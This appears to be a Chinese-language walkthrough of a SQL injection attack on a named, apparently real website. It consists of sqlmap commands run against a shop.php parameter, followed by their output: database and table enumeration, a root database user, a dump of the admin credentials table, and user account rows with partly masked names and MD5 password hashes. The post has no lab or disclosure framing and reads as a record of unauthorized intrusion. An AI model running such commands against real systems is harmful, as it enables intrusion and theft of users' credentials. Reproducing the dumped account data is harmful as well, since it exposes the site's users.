某网SQL注入漏洞实战

 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dbs

 

available databases [8]:
[*] dntg
[*] dntg2
[*] dnweb
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ultrax

 

 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-db
#当前数据库

 

current database:    'dnweb'

 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-user
#当前数据库用户
current user:    'root@localhost'

 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --table -D "dnweb"
#列数据库表名

 

Database: dnweb
[25 tables]
+-----------------+
| account         |
| admin_user      |
| base            |
| chajian         |
| chongzhi        |
| duihuan         |
| libao_jilu      |
| libao_list      |
| meirilibao      |
| meirilibao_jilu |
| mianfei         |
| mianfei_list    |
| money_name      |
| role_dellist    |
| roleid          |
| server          |
| shop_list       |
| shop_list_copy  |
| shop_tag        |
| tuiguang        |
| xiaofei         |
| zhuce           |
| zkfcn           |
| zkfcq           |
| zkfwp           |
+-----------------+

 

 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --columns -T "admin_user"
#列名

 

Database: dnweb
Table: admin_user
[2 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| admin_name | varchar(20) |
| admin_pass | varchar(32) |
+------------+-------------+

 

 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dump -C "admin_name，admin_pass " -T "admin_user" -D "dnweb"
#列数据

 

Database: dnweb
Table: admin_user
[1 entry]
+------------+----------------------------------+
| admin_name | admin_pass                       |
+------------+----------------------------------+
| lok**      | a9ee8d24806ee22c2daad334****** |
+------------+----------------------------------+

 

 

 

Database: dnweb
Table: account
[20 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| createtime | datetime     |
| dlts       | int(11)      |
| email      | varchar(255) |
| gold       | int(10)      |
| id         | int(10)      |
| jifen      | int(10)      |
| lastip     | varchar(16)  |
| logintime  | datetime     |
| lxdl       | int(11)      |
| money      | int(10)      |
| money2     | int(10)      |
| name       | varchar(32)  |
| namemd5id  | varchar(32)  |
| password   | varchar(32)  |
| regip      | varchar(16)  |
| security   | varchar(32)  |
| tg         | int(10)      |
| tg2        | int(10)      |
| tingyong   | int(11)      |
| vip        | int(255)     |
+------------+--------------+

 

 

 

+-------+------------+-------------+----------------------------------+----------+
| id    | email      | name        | password                         | security |
+-------+------------+-------------+----------------------------------+----------+
| 11827 | 13350*     | a414409798  | cee4fce6eaa87581421c296cbc0d3064 | NULL     |
| 11828 | 000000     | lo***       | 670b14728ad9902aecba32e22fa4f6bd** | NULL     |
| 11829 | 8888*       | q139818572* | 4607e782c4d86fd5364d7e4508bb10d9 | NULL     |
| 11830 | 123456     | 203412594*  | cfd40caa535bb51378ab60849bb54486 | NULL     |
| 11831 | 123456789  | na101*      | e10adc3949ba59abbe56e057f20f883e | NULL     |
| 11832 | NULL       | hyt100*     | 4c49c824492864666980b012bcf17d08 | NULL     |
| 11833 | 32312*     | hehe52121*  | 0733f98f76375074a3424d5b6e8ffd68 | NULL     |
| 11834 | 123456789* | fong201*    | 2798ba5d7c1b4f6eec30c9a9cad51dca | NULL     |
| 11835 | 123456     | q50504*     | e10adc3949ba59abbe56e057f20f883e | NULL     |
| 11836 | 1*          | wf199*      | 96e79218965eb72c92a549dd5a330112 | NULL     |
+-------+------------+-------------+----------------------------------+----------+